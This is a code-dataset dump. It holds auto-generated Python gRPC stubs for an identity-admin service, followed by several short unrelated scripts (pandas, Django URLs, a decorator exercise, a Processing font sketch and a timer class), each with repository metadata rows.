'UpdateEmailsSetup': grpc.unary_unary_rpc_method_handler(
servicer.UpdateEmailsSetup,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.SerializeToString,
),
'GetUserBaseStatistics': grpc.unary_unary_rpc_method_handler(
servicer.GetUserBaseStatistics,
request_deserializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.FromString,
response_serializer=devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'depot.devtools.auth.v0.identity.admin.Admin', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Admin(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def CreateIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentitiesByAttribute(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentitiesByAttribute',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesByAttributeResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentities(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentities',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentitiesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteIdentity(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdentity',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdentityResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAddresses(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddresses',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressesResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAddress(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetAddress',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetAddressResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateAddress(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateAddress',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateAddressResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetTraits(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetTraits',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetTraitsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateTraits(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateTraits',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateTraitsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetCredentials(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetCredentials',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetCredentialsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateCredential(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateCredential',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateCredentialResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdentityLoginAttempts(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdentityLoginAttempts',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdentityLoginAttemptsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetConnections(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetConnections',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetConnectionsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteConnection(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteConnection',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteConnectionResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdSchemas(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchemas',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemasResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetDefaultIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetDefaultIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetDefaultIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def MarkDefaultIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/MarkDefaultIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.MarkDefaultIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteIdSchema(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteIdSchema',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteIdSchemaResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/CreateOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.CreateOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetOAuth2Clients(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetOAuth2Clients',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetOAuth2ClientsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteOAuth2Client(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/DeleteOAuth2Client',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.DeleteOAuth2ClientResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetEmailsSetup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetEmailsSetup',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetEmailsSetupResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateEmailsSetup(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/UpdateEmailsSetup',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.UpdateEmailsSetupResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetUserBaseStatistics(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/depot.devtools.auth.v0.identity.admin.Admin/GetUserBaseStatistics',
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsRequest.SerializeToString,
devtools_dot_auth_dot_v0_dot_proto_dot_identity_dot_admin_dot_admin__pb2.GetUserBaseStatisticsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 59.479817 | 164 | 0.725896 |
7eef7523932b29f9861b14ba707a8cb4e97912eb | 442 | py | Python | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | null | null | null | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | null | null | null | Modulo_5/semana_2/dataframe/iteracion/iteracion2.py | AutodidactaMx/cocid_python | 11628f465ff362807a692c79ede26bf30dd8e26a | [
"MIT"
] | 1 | 2022-03-04T00:57:18.000Z | 2022-03-04T00:57:18.000Z | # importing pandas as pd
import pandas as pd
# Listas
dict = {'nombre':["luis", "marcos", "marta", "pedro"],
'grado': ["LIC", "MTA", "DOC", "LIC"],
'puntaje':[90, 40, 80, 98]}
# Creando un marco de datos a partir de un diccionario
df = pd.DataFrame(dict)
# creando una lista de columnas de marcos de datos
columns = list(df)
for i in columns:
# imprimiendo el tercer elemento de la columna
print (df[i][2])
| 24.555556 | 54 | 0.624434 |
206ca457a4dd0d48dbf0260038c61b742b39e238 | 639 | py | Python | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 2 | 2021-04-23T21:35:02.000Z | 2021-04-24T15:17:16.000Z | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 1 | 2021-04-24T17:20:33.000Z | 2021-04-24T17:23:15.000Z | config/urls.py | rigelk/magiciendose | d2613f6a548dd620f101f6533bf7bea71a5ab3b0 | [
"MIT"
] | 1 | 2021-04-23T14:35:58.000Z | 2021-04-23T14:35:58.000Z | from django.conf import settings
from django.contrib import admin
from django.urls import path, include
from rest_framework.schemas import get_schema_view
urlpatterns = [
path('admin/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
path('api/', include('api_urls')),
path('openapi', get_schema_view(
title="MagicienDose",
description="API for MagicienDose",
version="1.0.0"
), name='openapi-schema'),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path('__debug__/', include(debug_toolbar.urls)),
] + urlpatterns
| 27.782609 | 56 | 0.672926 |
fc7fc9a4cc19f323eb62cbd94f36a6b02b797f58 | 442 | py | Python | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 32 | 2020-04-05T08:29:40.000Z | 2022-01-08T03:10:00.000Z | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 3 | 2021-06-02T04:09:11.000Z | 2022-03-02T14:55:03.000Z | Fun Excercise/decorator5.py | NirmalSilwal/Python- | 6d23112db8366360f0b79bdbf21252575e8eab3e | [
"MIT"
] | 3 | 2020-07-13T05:44:04.000Z | 2021-03-03T07:07:58.000Z | def decorator_func(say_hello_func):
def wrapper_func(hello_var, world_var):
hello = "Hello, "
world = "World"
if not hello_var:
hello_var = hello
if not world_var:
world_var = world
return say_hello_func(hello_var, world_var)
return wrapper_func
@decorator_func
def say_hello(hello_var, world_var):
print(hello_var + " " + world_var)
say_hello("Hello", "") | 18.416667 | 51 | 0.626697 |
e3526c5e2d24166b71b1bfbdd443659a10f1061d | 26 | py | Python | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | python/test.py | chaleaoch/code | eba44be0b3d9a31434f32d0fd38332bf75a93130 | [
"MIT"
] | null | null | null | import json
import django
| 8.666667 | 13 | 0.846154 |
698765451946f2f554a12a324a494b51a576394d | 127 | py | Python | src/main/python/app/style.py | kevinyu/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | 1 | 2020-10-03T18:35:52.000Z | 2020-10-03T18:35:52.000Z | src/main/python/app/style.py | theunissenlab/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | null | null | null | src/main/python/app/style.py | theunissenlab/soundsep | 58f8100e101a6302533626d2f141c86748c8dc10 | [
"MIT"
] | 1 | 2020-08-12T17:16:15.000Z | 2020-08-12T17:16:15.000Z | qss = """
#Window{
background-color: white
}
QPushButton[flat="true"]{
background-color: black;
border: 0px;
}
"""
| 12.7 | 28 | 0.606299 |
385e2d026e5155bee5296a2c879aba6bcf7f2d01 | 3,849 | pyde | Python | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | 11 | 2019-06-05T04:37:38.000Z | 2021-08-30T13:40:47.000Z | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | null | null | null | font_fingerprints_square/font_fingerprints_square.pyde | cclauss/generative_art | fc179177badd8b54b4faefd6f36f3d974ff0ca65 | [
"MIT"
] | 1 | 2020-05-07T13:16:43.000Z | 2020-05-07T13:16:43.000Z | ################################################################################
# Aaron Penne
# 2018-08-28
# https://github.com/aaronpenne
################################################################################
import datetime
import string
import sys
# Define globals here
rand_seed = 1138
frame_rate = 1
w = 2000 # width
h = 2000 # height
count = 0
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def setup():
# Sets size of canvas in pixels (must be first line)
size(w, h) # (width, height)
# Sets resolution dynamically (affects resolution of saved image)
pixelDensity(displayDensity()) # 1 for low, 2 for high
# Sets color space to Hue Saturation Brightness with max values of HSB respectively
colorMode(HSB, 360, 100, 100, 100)
# Set the number of frames per second to display
frameRate(frame_rate)
# Stops draw() from running in an infinite loop (should be last line)
randomSeed(rand_seed)
noLoop()
def draw():
global count
if count > 5000:
sys.exit(0)
count += 1
# Read font list
try:
with open('font_list_mac.txt', 'r') as f:
font_list = f.read().splitlines()
except:
print('Using all fonts')
font_list = PFont.list()
font_list = ['Webdings']
# filter_list = ['Bold', 'Italic', 'Heavy', 'Black', 'Light']
# font_list_text = [x for x in PFont.list() if ~any(f in x for f in filter_list)]
# # Get the fonts in a text file
# with open('font_list_mac.txt', 'w+') as f:
# for font in font_list_text:
# f.write('{}\n'.format(font))
text_size = 600
for font in font_list:
# Background color
# hue_val = random_centered(26.7, 5)
# sat_val = random_centered(3.7, 3)
# bri_val = random_centered(95.3, 3)
background(26.7, 3.7, 95.3) #f3eeea
# Initialize font
text_font = createFont(font, text_size)
textFont(text_font)
# Text properties
fill(0, 0, 4, 7) #3f3f3f
#fill(168, 31.7, 74.1, 4) #81bdb1
stroke(0, 0, 0)
textAlign(CENTER, CENTER)
textSize(text_size)
# Print each string at different locations
offset = h/3
h_pad = -h*0.04
print_string_stack(string.punctuation, w/3, h/3+h_pad)
print_string_stack(string.ascii_lowercase, 2*w/3, h/3+h_pad)
full_string = string.ascii_lowercase + string.ascii_uppercase + string.digits
print_string_stack(full_string, w/3, 2*h/3+h_pad)
print_string_stack(string.ascii_uppercase, 2*w/3, 2*h/3+h_pad)
# Prints the name of the font
text_font = createFont('LucidaSans-Typewriter', text_size)
textFont(text_font)
fill(0, 0, 0, 30)
textAlign(CENTER, BOTTOM)
textSize(35)
text(font, w/2, 5.6*offset)
font_name = font.replace('\\', '')
font_name = font.replace('/', '')
output_filename = os.path.join('output', '{}_{}.png'.format(timestamp, font_name))
saveFrame(output_filename)
print(output_filename)
def random_list_value(val_list):
index = int(random(0, len(val_list)))
value = val_list[index]
return value
def random_centered(value_og, offset=5):
value = random(value_og-offset, value_og+offset)
return value
def print_string_stack(string_stack='TESt', w_offset=100, h_offset=100):
for c in string_stack:
text(c, w_offset, h_offset)
def create_filename(word, num_list=[]):
filename = word
for number in num_list:
filename = filename + '_{:04}'.format(int(number))
filename = filename + '.png'
return filename
| 29.381679 | 90 | 0.573655 |
68e00a03e4f49ca331f71aea8400f20f79447ee6 | 175 | py | Python | utils/stupid_timer.py | vladimirgamalyan/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | null | null | null | utils/stupid_timer.py | vladimirgamalyan/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | 1 | 2017-04-08T20:40:21.000Z | 2017-04-08T20:51:40.000Z | utils/stupid_timer.py | vladimirgamalian/pictools | cfcda3f4a1272d8469f2dc604a8afc585929b0eb | [
"MIT"
] | null | null | null | #!/usr/bin/python
import time
class StupidTimer:
def __init__(self, t):
self.t = time.clock() + t
def finished(self):
return time.clock() > self.t
| 14.583333 | 36 | 0.594286 |
09c319e4797542156f892f954e07dcae37673af5 | 468 | py | Python | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
] | 1 | 2022-01-16T23:29:39.000Z | 2022-01-16T23:29:39.000Z | books_api/core/models.py | kennyaires/olist-challenge | ec0194c9b48d4ec8693d3d39498f63f42dfaf251 | [
"MIT"
